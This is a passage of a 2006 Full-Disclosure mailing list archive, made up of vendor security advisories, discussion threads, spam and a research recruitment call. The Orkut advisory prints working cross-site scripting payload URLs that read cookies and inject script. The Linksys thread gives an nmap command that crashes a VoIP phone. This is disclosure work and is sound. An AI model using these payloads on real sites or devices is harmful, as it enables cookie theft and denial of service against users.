f926720946b2df30c66c62f7a66aaba8 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libgdbm-ruby1.8_1.8.4-5ubuntu1.2_powerpc.deb Size/MD5: 173864 04b680e0347869403a09cf9f630c9a55 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libopenssl-ruby1.8_1.8.4-5ubuntu1.2_powerpc.deb Size/MD5: 267234 17a196d0c1b485cd571c42adfc77689d http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libreadline-ruby1.8_1.8.4-5ubuntu1.2_powerpc.deb Size/MD5: 173520 2dd8d2f8ce3c53c39fa820eaa2a9a0e0 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8-dbg_1.8.4-5ubuntu1.2_powerpc.deb Size/MD5: 1069614 2280c70cdf9d1c98f659b4a58ccca045 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8_1.8.4-5ubuntu1.2_powerpc.deb Size/MD5: 1520688 29af64f8ac3edc9a22c3d41df27ad5c7 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libtcltk-ruby1.8_1.8.4-5ubuntu1.2_powerpc.deb Size/MD5: 1800718 4bdef6264f711486ae09988fd8871282 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8-dev_1.8.4-5ubuntu1.2_powerpc.deb Size/MD5: 689070 42cebb7853832c61cc99ee7b4b9c02d8 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4-5ubuntu1.2_powerpc.deb Size/MD5: 193214 12971cfc5aea7409c5c380b53446c547 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libdbm-ruby1.8_1.8.4-5ubuntu1.2_sparc.deb Size/MD5: 170924 6e57c642a819e0dc9b00a71585477865 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libgdbm-ruby1.8_1.8.4-5ubuntu1.2_sparc.deb Size/MD5: 171704 476e1774fadd13553c6d64b21e27fd8c http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libopenssl-ruby1.8_1.8.4-5ubuntu1.2_sparc.deb Size/MD5: 269338 139cd674bce5d4ed9d459741067ca5d4 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libreadline-ruby1.8_1.8.4-5ubuntu1.2_sparc.deb Size/MD5: 171648 3c0e1b84f467a5e2694a274f6fc6a366 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8-dbg_1.8.4-5ubuntu1.2_sparc.deb Size/MD5: 923638 619c17b5ce815a73b947f1bd86226528 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8_1.8.4-5ubuntu1.2_sparc.deb Size/MD5: 1472008 92f5af5dd58bcd09fc78325cadad002c http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libtcltk-ruby1.8_1.8.4-5ubuntu1.2_sparc.deb Size/MD5: 1796578 eb84364062c5628ef87b1751bf3ad238 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8-dev_1.8.4-5ubuntu1.2_sparc.deb Size/MD5: 711580 3a6932c9f94dae9b94cca8fd06643b3b http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4-5ubuntu1.2_sparc.deb Size/MD5: 191302 065b6e5984291cedcedcbb6ab8244f47 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061207/1117fbbc/attachment.bin From rajesh.sethumadhavan at yahoo.com Fri Dec 8 07:26:07 2006 From: rajesh.sethumadhavan at yahoo.com (Rajesh Sethumadhavan) Date: Thu, 7 Dec 2006 23:26:07 -0800 (PST) Subject: [Full-disclosure] Orkut Multiple Cross Site Scripting Vulnerabilities Message-ID: <893889.65198.qm@web37212.mail.mud.yahoo.com> Orkut Multiple Cross Site Scripting Vulnerabilities ##################################################################### XDisclose Advisory : XD100092 Vulnerability Discovered: November 18th 2006 Advisory Released : December 08th 2006 Credit : Rajesh Sethumadhavan Class : Cross Site Scripting HTML Injection Severity : Medium Solution Status : Unpatched Vendor : Google Inc Vendor Website : http://www.orkut.com Affected applications : Orkut Services Affected Platform : All ##################################################################### Overview: Orkut is an Internet social network service run by Google and named after its creator, Orkut B?y?kk?kten. It claims to be designed to help users meet new friends and maintain existing relationships with pictures and messages, and establish new ones by reaching out to people you've never met before. Orkut service is vulnerable to Cross-Site Scripting and HTML Injection. This is caused due to improper validation of user-supplied inputs. Description: A remote attacker can craft a GET request with the XSS payload as demonstrated below. When the victim clicks on the GET request the payload will get executed which result in stealing of cookie, IP info, refer info, browser information, clipboard content, operating system info, hardware Info, modification of page or html injection, url redirection, port scanning of the network, and even phishing is possible. 1)Orkut Invite XSS: The flaws are due to improper sanitization of inputs passed to 'continue' parameter in GET request ------------------------------------------------------------------- http://www.orkut.com/Invite.aspx?continue=javascript:alert(document.cookie) ------------------------------------------------------------------ Demonstration: Note: Demonstration leads to your personal information disclosure - Login to your orkut account - Paste the above URL - Click on BACK button - Orkut Cookies will get displayed The similar way HTML injection is also possible. Vulnerable Code: ------------------------------------------------------------------ ------------------------------------------------------------------ 2)Orkut Next page XSS: The flaws are due to improper sanitization of inputs passed to 'nid' parameter in GET request. This vulnerability is already fixed 2 days before Get Request with XSS payload: ------------------------------------------------------------------ http://www.orkut.com/Scrapbook.aspx?uid=3595989687719502785&pageSize =&na=3&nst=-2&nid=13550271097807907792-%22};%20alert('Xdisclose');% 20function%20tt(){// ------------------------------------------------------------------ Vulnerable Code: ------------------------------------------------------------------ function changePageSize(value) { window.location="/Scrapbook.aspx?uid=3595989687719502785&na= 1&nst=1&nid=13550271097807907792-"}; alert('Xdisclose'); function tt(){//&pageSize="+value; } ------------------------------------------------------------------ Solution: Orkut can improve their filters by disallowing certain characters like " <>/\?&`~!@#$%^*()[]|;:"' " in user input URL. Screenshot: http://www.xdisclose.com/Images/xdorkutinvitexss.jpg Impact: Successful exploitation allows execution of arbitrary script code in a user?s browser session in context of an affected site which result in stealing of cookie, IP info, refer info, browser information, clipboard content, operating system info, Referer info, hardware Info, modification of page or html injection (temporary webpage defacement), modification of page title, hijacking page flow, url redirection, port scanning of the victim?s network, and even phishing is possible. Impact of the vulnerability is network level. Original Advisory: http://www.xdisclose.com/XD100092.txt Credits: Rajesh Sethumadhavan has been credited with the discovery of this vulnerability Disclaimer: This entire document is strictly for educational, testing and demonstrating purpose only. Modification use and/or publishing this information is entirely on your own risk. The exploit code is to be used on your own orkut account. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. --------------------------------- Everyone is raving about the all-new Yahoo! Mail beta. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061207/c2935d38/attachment.html From shawnmer at gmail.com Fri Dec 8 06:53:07 2006 From: shawnmer at gmail.com (Shawn Merdinger) Date: Thu, 7 Dec 2006 22:53:07 -0800 Subject: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash fromNmap scan In-Reply-To: References:

Message-ID: Hi, Yes, this is an extraordinarily lame bug, but that's sort of the point with many of these VoIP phones, both wired and wireless. They are a new class of device going onto networks and tend to be kind of sucky when it comes to what I'd consider *expected customer environment tool runs* like Nmap and Nessus, not to mention plenty of others such as ISIC, Protos, Asteroid, ...and that's just sticking with the free stuff. I didn't find the bug anyways, I just reported it to Linksys and then FD. And even though I'm poking around with a bunch of VoIP phones on my own time and dime, I don't own one of these WIP 330s. Anyway, you seem happy with your WIP 330...once you got it configured... http://www.trixbox.org/modules/newbb/viewtopic.php?topic_id=5974&forum=3#forumpost23445 Say, if you have the cycles for some free vendor QA, and since you have a WIP 330 in hand, maybe you can find something much cooler with that PhoneCtl.exe crash and get back to us? Thanks, --scm On 12/7/06, pingywon wrote: > > "The crash > > appears related to PhoneCtl.exe running on the phone's Windows CE 4.2 > > operating system." > > "Let me take a look at that screenshot again..." > > http://www.flickr.com/photos/metalmijn/295348294/ > > "Heck buddy, you appear correct" > > ~p > > > > > > ----- Original Message ----- > From: "Shawn Merdinger" > To: > Sent: Wednesday, December 06, 2006 1:40 PM > Subject: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash > fromNmap scan > > > > Vulnerability Description > > ================== > > The Linksys WIP 330 VoIP wireless phone will crash when a full > > port-range Nmap scan is run against its IP address. > > > > > > Linksys WIP 330 Firmware Version > > ========================== > > 1.00.06A > > > > > > Nmap scan command > > ================ > > nmap -P0 -p 1-65535 > > > > > > Impact > > ===== > > The crash is only after Nmap has finished. The Nmap scan also seems to > > disrupt updating of the display as the clock is not updated. The crash > > appears related to PhoneCtl.exe running on the phone's Windows CE 4.2 > > operating system. > > > > Screenshot of the crash: http://www.flickr.com/photos/metalmijn/295348294/ > > > > > > Credit > > ==== > > Credit for discovering this vulnerability goes to Armijn Hemel > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > From radules at telekom.yu Fri Dec 8 13:31:52 2006 From: radules at telekom.yu (solenoid (lists)) Date: Fri, 08 Dec 2006 14:31:52 +0100 Subject: [Full-disclosure] What was the name of the web site ... Message-ID: <45796948.8070604@telekom.yu> ... that keeps track of MS vulnerabilities, patches and the corresponding exploits? I know that it was mentioned earlier in this list but can not remember the URL right now... TIA From lwang at lwang.org Fri Dec 8 13:50:40 2006 From: lwang at lwang.org (Louis Wang) Date: Fri, 8 Dec 2006 21:50:40 +0800 Subject: [Full-disclosure] Google pageranked 4 doamin on sale... Message-ID: <21ae1b060612080550x24e0ed4fg4dc2340e7b02b67e@mail.gmail.com> hi, there: I don't konw whether it is the right place to post this message, but the web site is security related in my original thought. I'd like to sell my web site http://www.lwang.org. It has google pageranked 4, and full control of domain. The web server is in Czech, it has 500M space and 5G traffic per month. Anyone interested in it, please contact me. Thanks. From pingywon at hotmail.com Fri Dec 8 15:10:16 2006 From: pingywon at hotmail.com (pingywon) Date: Fri, 8 Dec 2006 10:10:16 -0500 Subject: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash fromNmap scan References:

Message-ID: They are truly a "fragile" class of new devices. I bought the over priced WIP330 for testing myself. And minus the rather good screen brightness and resolution in pretty disappointed with it (its just a cumbersome phone). but as long as Cisco is still selling their gray scale wifi phone for $500 I consider it a deal. ----- Original Message ----- From: "Shawn Merdinger" To: "pingywon" ; Sent: Friday, December 08, 2006 1:53 AM Subject: Re: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash fromNmap scan > Hi, > > Yes, this is an extraordinarily lame bug, but that's sort of the point > with many of these VoIP phones, both wired and wireless. They are a > new class of device going onto networks and tend to be kind of sucky > when it comes to what I'd consider *expected customer environment tool > runs* like Nmap and Nessus, not to mention plenty of others such as > ISIC, Protos, Asteroid, ...and that's > just sticking with the free stuff. > > I didn't find the bug anyways, I just reported it to Linksys and then > FD. And even though I'm poking around with a bunch of VoIP phones on > my own time and dime, I don't own one of these WIP 330s. > > Anyway, you seem happy with your WIP 330...once you got it configured... > http://www.trixbox.org/modules/newbb/viewtopic.php?topic_id=5974&forum=3#forumpost23445 > > Say, if you have the cycles for some free vendor QA, and since you > have a WIP 330 in hand, maybe you can find something much cooler with > that PhoneCtl.exe crash and get back to us? > > Thanks, > --scm > > > > > On 12/7/06, pingywon wrote: >> >> "The crash >> > appears related to PhoneCtl.exe running on the phone's Windows CE 4.2 >> > operating system." >> >> "Let me take a look at that screenshot again..." >> >> http://www.flickr.com/photos/metalmijn/295348294/ >> >> "Heck buddy, you appear correct" >> >> ~p >> >> >> >> >> >> ----- Original Message ----- >> From: "Shawn Merdinger" >> To: >> Sent: Wednesday, December 06, 2006 1:40 PM >> Subject: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash >> fromNmap scan >> >> >> > Vulnerability Description >> > ================== >> > The Linksys WIP 330 VoIP wireless phone will crash when a full >> > port-range Nmap scan is run against its IP address. >> > >> > >> > Linksys WIP 330 Firmware Version >> > ========================== >> > 1.00.06A >> > >> > >> > Nmap scan command >> > ================ >> > nmap -P0 -p 1-65535 >> > >> > >> > Impact >> > ===== >> > The crash is only after Nmap has finished. The Nmap scan also seems to >> > disrupt updating of the display as the clock is not updated. The crash >> > appears related to PhoneCtl.exe running on the phone's Windows CE 4.2 >> > operating system. >> > >> > Screenshot of the crash: >> > http://www.flickr.com/photos/metalmijn/295348294/ >> > >> > >> > Credit >> > ==== >> > Credit for discovering this vulnerability goes to Armijn Hemel >> > >> > _______________________________________________ >> > Full-Disclosure - We believe in it. >> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> > Hosted and sponsored by Secunia - http://secunia.com/ >> > >> >> > From skx at debian.org Fri Dec 8 15:30:27 2006 From: skx at debian.org (Steve Kemp) Date: Fri, 8 Dec 2006 15:30:27 +0000 Subject: [Full-disclosure] [SECURITY] [DSA-1230-1] new l2tpns packages fix buffer overflow Message-ID: <20061208153027.GA24274@steve.org.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1230-1 security at debian.org http://www.debian.org/security/ Steve Kemp December 08, 2006 - ------------------------------------------------------------------------ Package : l2tpns (2.0.14-1sarge1) Vulnerability : buffer overflow Problem type : remote Debian-specific: no CVE Id(s) : CVE-2006-5873 Debian Bug : 401742 Rhys Kidd discovered a vulnerability in l2tpns, a layer 2 tunnelling protocol network server, which could be triggered by a remote user to execute arbitary code. For the stable distribution (sarge), this problem has been fixed in version 2.0.14-1sarge1. For the unstable distribution (sid) this problem has been fixed in version 2.1.21-1 We recommend that you upgrade your l2tpns package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian 3.1 (stable) - ------------------- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14.orig.tar.gz Size/MD5 checksum: 149672 462bca675b5e27f40f5e5f92918911cb http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1.diff.gz Size/MD5 checksum: 2760 21dd07043e996a6deb282ad9318ff523 http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1.dsc Size/MD5 checksum: 585 16faad913601881770b688f2fc8e8357 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1_alpha.deb Size/MD5 checksum: 195906 4d8481e9bf411cd71b3439fba8c65f4d amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1_amd64.deb Size/MD5 checksum: 152440 164d2205b4cd8fc99bc4763fb7ac9b38 arm architecture (ARM) http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1_arm.deb Size/MD5 checksum: 151706 317794e1cbd89bf03a5276a5e0e6e946 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1_hppa.deb Size/MD5 checksum: 169062 80e4b651500315e6cfeae09cbd990cca i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1_i386.deb Size/MD5 checksum: 144584 4a447fcc5dae3781f84f21bc8a262937 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1_ia64.deb Size/MD5 checksum: 227898 e14fc8e036271566d4a9178e10650ad3 m68k architecture (Motorola Mc680x0) http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1_m68k.deb Size/MD5 checksum: 128076 e30c757e00a9914890caeab4da5e364d mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1_mips.deb Size/MD5 checksum: 165256 c5eadfb746ff587e557241fcea756011 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1_mipsel.deb Size/MD5 checksum: 168406 b11641d83e799878de35512edb09dbfa powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1_powerpc.deb Size/MD5 checksum: 168706 9b4038dbfaa5fe14ac7df25857cc0e7f s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1_s390.deb Size/MD5 checksum: 155020 d4a196ecf8b13ae8d0830e45571cc29d sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1_sparc.deb Size/MD5 checksum: 160188 ab36083d96a6d5ca028d93032eccdec0 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.1 (GNU/Linux) iD8DBQFFeYTewM/Gs81MDZ0RAiNuAJ4o30KstSFj0X5GrshuYyqA9ZQD+ACg0Sra sYfycLstw+C/fh2GUnJDBdM= =zQOG -----END PGP SIGNATURE----- From dudevanwinkle at gmail.com Fri Dec 8 16:37:43 2006 From: dudevanwinkle at gmail.com (Dude VanWinkle) Date: Fri, 8 Dec 2006 11:37:43 -0500 Subject: [Full-disclosure] Google pageranked 4 doamin on sale... In-Reply-To: <21ae1b060612080550x24e0ed4fg4dc2340e7b02b67e@mail.gmail.com> References: <21ae1b060612080550x24e0ed4fg4dc2340e7b02b67e@mail.gmail.com> Message-ID: On 12/8/06, Louis Wang wrote: > I'd like to sell my web site http://www.lwang.org. It has google > pageranked 4, and full control of domain. The web server is in Czech, > it has 500M space and 5G traffic per month. is it pageranked #4 for the word "wang"? what is the czech work for Willie the One Eyed Wonder Weasel?? anyways, if you are going to try and sell a site based on its rank, and assuming you arent talking about smell, you might want to include the category. Even though you said its a security related site; the content isnt always a guarantee of the category it is associated with, see: disney pr0n googlebombing, etc, etc. We could look it up, but not only are FD'ers notoriously lazy, as you are the "salesman" you might want to try and attract lazy marks,.. err buyers. -JP Bonus wang link with a hat-tip to Larry Seltzer for providing it, maybe NSFW depending on where you W: http://www.starma.com/penis/penis.html From researchonhackers at yahoo.com Fri Dec 8 16:32:35 2006 From: researchonhackers at yahoo.com (Thomas Holt) Date: Fri, 8 Dec 2006 08:32:35 -0800 (PST) Subject: [Full-disclosure] Call For Participants For A Research Study Of Hacker Culture Message-ID: <20061208163235.15537.qmail@web58915.mail.re1.yahoo.com> Greetings, My name is Tom Holt, and I am an Assistant Professor at the University of North Carolina at Charlotte. I am currently conducting a study of hackers and hacking and am seeking interested men and women who may be willing to participate. The purpose of this research is to understand the ways that people become interested in computers and hacking, their motives for hacking, and how they apply their skills in different settings. This study will also consider individuals? conceptions of hacking and experiences in hacker culture. To understand this phenomenon, I am seeking individuals who are willing to share their experiences and opinions in an interview which can be conducted either in person or via encrypted e-mail. Strict confidentiality will be maintained and your privacy ensured. I have obtained a Certificate of Confidentiality from the National Institutes of Health to further protect and ensure your privacy and confidentiality. All individuals who complete an interview will be paid $10 for their time, and $10 will also be paid for successful referrals. If you know anyone who is, or considers his/herself to be a hacker and is willing to be interviewed, please contact me via email at tjholt at uncc.edu, at researchonhackers at yahoo.com, or by phone at 704-795-9544. Again, strict confidentiality will be maintained and your privacy ensured. I am not a law enforcement agent nor connected with any law enforcement agency and am not looking to hear crazy stories about how you hacked NASA. If you have, great, but I realize there is more to hacking than simple media conceptions of the hacker as a criminal. Instead, I am interested in understanding hacking from the hackers? point of view. I have presented my research and described this project at several cons, including CarolinaCon 06, PhreakNIC X, and Defcons 13/14 and am hoping to hear from more individuals in the community. Please contact me if you are interested, and I look forward to hearing from you. Thank you, Thomas J. Holt, Ph. D. ____________________________________________________________________________________ Yahoo! Music Unlimited Access over 1 million songs. http://music.yahoo.com/unlimited -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061208/6fd63309/attachment.html From jan.monsch at iplosion.com Fri Dec 8 17:05:29 2006 From: jan.monsch at iplosion.com (Jan P. Monsch) Date: Fri, 8 Dec 2006 18:05:29 +0100 Subject: [Full-disclosure] Enforcing Java Security Manager in Restricted Windows Environments? Message-ID: <00bc01c71aeb$1393ab70$8210a8c0@moon1> Hi Lately I came across several Citrix and Terminal Server projects which provide a restricted set of applications to their users. This is achieved using Windows Software Restriction Policies or AppSense Application Manager to white or black list executables. One of these permitted binaries is often java.exe. Now the problem arises that once Java is enabled any Java application can be executed on the system. This allows a malicious user to execute arbitrary Java code, like replacement shells (JSH), RDP clients (Propero Java RDP) and network port scanners. I could block java.exe but business requires that the company's Java application must still work. This lead me into this research on how to white list Java applications in a restricted Windows environment. For gory details see: http://www.iplosion.com/archives/54 So all this melts down to my question: Is there a way to tell java.exe to always use the Java Security Manager without the possibility of manipulation by the user? I would be very interested to learn your ideas. Kind regards Jan P. Monsch From Simon.Richter at hogyros.de Fri Dec 8 17:39:29 2006 From: Simon.Richter at hogyros.de (Simon Richter) Date: Fri, 08 Dec 2006 18:39:29 +0100 Subject: [Full-disclosure] Call For Participants For A Research Study Of Hacker Culture In-Reply-To: <20061208163235.15537.qmail@web58915.mail.re1.yahoo.com> References: <20061208163235.15537.qmail@web58915.mail.re1.yahoo.com> Message-ID: <4579A351.1050409@hogyros.de> Hello, Thomas Holt wrote: > The purpose of this research is to understand > the ways that people become interested in computers and hacking, their > motives for hacking, and how they apply their skills in different > settings. This study will also consider individuals? conceptions of > hacking and experiences in hacker culture. [...] > I am not a law enforcement agent nor connected with any law enforcement > agency and am not looking to hear crazy stories about how you hacked > NASA. If you have, great, but I realize there is more to hacking than > simple media conceptions of the hacker as a criminal. Instead, I am > interested in understanding hacking from the hackers? point of view. It is not clear how you understand the term "hacker". In your opening paragraph, it basically describes someone who is interested in "how things work" (which is close to the definition given in The New Hacker's Dictionary), in the closing it appears to describe people engaged in illegal activity (whom TNHD calls "crackers"). So the question is, are you researching the motivation for gaining knowledge about technology, or are you researching the motivation for illegal activity in a technology setting (which is not really related to knowledge gathering, as can be seen by the vast numbers of "script kiddies" out there)? If this is about the former, I might have a few pointers for you. Simon From James.Williams at ca.com Fri Dec 8 17:57:52 2006 From: James.Williams at ca.com (Williams, James K) Date: Fri, 8 Dec 2006 12:57:52 -0500 Subject: [Full-disclosure] [CAID 34846]: CA BrightStor ARCserve Backup Discovery Service Buffer Overflow Vulnerability Message-ID: <649CDCB56C88AA458EFF2CBF494B620401D65A00@USILMS12.ca.com> Title: CAID 34846: CA BrightStor ARCserve Backup Discovery Service Buffer Overflow Vulnerability CA Vulnerability ID (CAID): 34846 CA Advisory Date: 2006-12-07 Discovered By: Assurent Secure Technologies (assurent.com) Impact: Remote attacker can execute arbitrary code. Summary: CA BrightStor ARCserve Backup contains a buffer overflow that allows remote attackers to execute arbitrary code with local SYSTEM privileges on Windows. This issue affects the BrightStor Backup Discovery Service in multiple BrightStor ARCserve Backup application agents and the Base product. Mitigating Factors: None. Severity: CA has given this vulnerability a High risk rating. Affected Products: BrightStor Products: - BrightStor ARCserve Backup r11.5 SP1 and below (SP2 does not have this vulnerability ; please apply r11.5 SP2) - BrightStor ARCserve Backup r11.1 - BrightStor ARCserve Backup for Windows r11 - BrightStor Enterprise Backup 10.5 - BrightStor ARCserve Backup v9.01 CA Protection Suites r2: - CA Server Protection Suite r2 - CA Business Protection Suite r2 - CA Business Protection Suite for Microsoft Small Business Server Standard Edition r2 - CA Business Protection Suite for Microsoft Small Business Server Premium Edition r2 Affected platforms: Microsoft Windows Status and Recommendation: Customers with vulnerable versions of BrightStor ARCserve Backup products should upgrade to the latest versions which are available for download from http://supportconnect.ca.com. Solution Document Reference APARs: QO84609, QI82917, QO84611, QO84610 Determining if you are affected: For a list of updated files, and instructions on how to verify that the security update was fully applied, please review the Informational Solution referenced in the appropriate Solution Document. References (URLs may wrap): CA SupportConnect: http://supportconnect.ca.com/ CA SupportConnect Security Notice for this vulnerability: Important Security Notice for BrightStor ARCserve Backup http://supportconnectw.ca.com/public/storage/infodocs/babsecurity-notice.asp Solution Document Reference APARs: QO84609, QI82917, QO84611, QO84610 CA Security Advisor Research Blog postings: http://www3.ca.com/blogs/posting.aspx?id=90744&pid=96149&date=2006/12 CAID: 34846 CAID Advisory links: http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34846 Discoverer: Assurent Secure Technologies http://www.assurent.com/ CVE Reference: CVE-2006-6379 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6379 OSVDB Reference: OSVDB IDs: 30775 http://osvdb.org/30775 Changelog for this advisory: v1.0 - Initial Release Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com. For technical questions or comments related to this advisory, please send email to vuln at ca.com, or contact me directly. If you discover a vulnerability in CA products, please report your findings to vuln at ca.com, or utilize our "Submit a Vulnerability" form. URL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research CA, One CA Plaza. Islandia, NY 11749 Contact http://www3.ca.com/contact/ Legal Notice http://www3.ca.com/legal/ Privacy Policy http://www3.ca.com/privacy/ Copyright ? 2006 CA. All rights reserved. From researchonhackers at yahoo.com Fri Dec 8 18:55:15 2006 From: researchonhackers at yahoo.com (Thomas Holt) Date: Fri, 8 Dec 2006 10:55:15 -0800 (PST) Subject: [Full-disclosure] Call For Participants For A Research Study Of Hacker Culture Message-ID: <20061208185515.11615.qmail@web58915.mail.re1.yahoo.com> Sorry for any confusion. I am referring to hacker in the context of an individual with a strong interest in technology who uses their skill in unique or innovative ways (in essence, the definition provided by TNHD). How did that knowledge base develop, what furthered your interests, and how do you apply your knowledge? I am not interested in script kiddies, crackers, and lamers who are only out to perform malicious attacks and want to brag about their experiences without actually understanding the mechanics behind what they have done. I hope that clears things up, though if there is still any confusion please let me know. Thanks, Tom ----- Original Message ---- From: Simon Richter To: Thomas Holt Cc: full-disclosure at lists.grok.org.uk Sent: Friday, December 8, 2006 12:39:29 PM Subject: Re: [Full-disclosure] Call For Participants For A Research Study Of Hacker Culture Hello, Thomas Holt wrote: > The purpose of this research is to understand > the ways that people become interested in computers and hacking, their > motives for hacking, and how they apply their skills in different > settings. This study will also consider individuals? conceptions of > hacking and experiences in hacker culture. [...] > I am not a law enforcement agent nor connected with any law enforcement > agency and am not looking to hear crazy stories about how you hacked > NASA. If you have, great, but I realize there is more to hacking than > simple media conceptions of the hacker as a criminal. Instead, I am > interested in understanding hacking from the hackers? point of view. It is not clear how you understand the term "hacker". In your opening paragraph, it basically describes someone who is interested in "how things work" (which is close to the definition given in The New Hacker's Dictionary), in the closing it appears to describe people engaged in illegal activity (whom TNHD calls "crackers"). So the question is, are you researching the motivation for gaining knowledge about technology, or are you researching the motivation for illegal activity in a technology setting (which is not really related to knowledge gathering, as can be seen by the vast numbers of "script kiddies" out there)? If this is about the former, I might have a few pointers for you. Simon ____________________________________________________________________________________ Do you Yahoo!? Everyone is raving about the all-new Yahoo! Mail beta. http://new.mail.yahoo.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061208/8dade820/attachment.html From sovietnam_88 at yahoo.com Fri Dec 8 18:54:57 2006 From: sovietnam_88 at yahoo.com (crook) Date: Fri, 8 Dec 2006 10:54:57 -0800 (PST) Subject: [Full-disclosure] This is serious business Message-ID: <590917.68755.qm@web58905.mail.re1.yahoo.com> loldongs --------------------------------- Everyone is raving about the all-new Yahoo! Mail beta. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061208/27f88a14/attachment.html -------------- next part -------------- A non-text attachment was scrubbed... Name: mCrook.jpg Type: image/pjpeg Size: 46940 bytes Desc: 549980111-mCrook.jpg Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061208/27f88a14/attachment.bin From sovietnam_88 at yahoo.com Fri Dec 8 19:08:46 2006 From: sovietnam_88 at yahoo.com (crook) Date: Fri, 8 Dec 2006 11:08:46 -0800 (PST) Subject: [Full-disclosure] MICHAEL CROOK COCK JPEG VULNERABILITY Message-ID: <20061208190846.92849.qmail@web58901.mail.re1.yahoo.com> Michael's crook --------------------------------- Access over 1 million songs - Yahoo! Music Unlimited. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061208/f5f35617/attachment.html -------------- next part -------------- A non-text attachment was scrubbed... Name: mCrook.jpg Type: image/pjpeg Size: 46940 bytes Desc: 549980111-mCrook.jpg Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061208/f5f35617/attachment.bin From noodle.mastah at gmail.com Fri Dec 8 19:16:01 2006 From: noodle.mastah at gmail.com (chinese soup) Date: Fri, 8 Dec 2006 20:16:01 +0100 Subject: [Full-disclosure] Call For Participants For A Research Study Of Hacker Culture In-Reply-To: <20061208163235.15537.qmail@web58915.mail.re1.yahoo.com> References: <20061208163235.15537.qmail@web58915.mail.re1.yahoo.com> Message-ID: Greetings! I come in peace!!! "I am 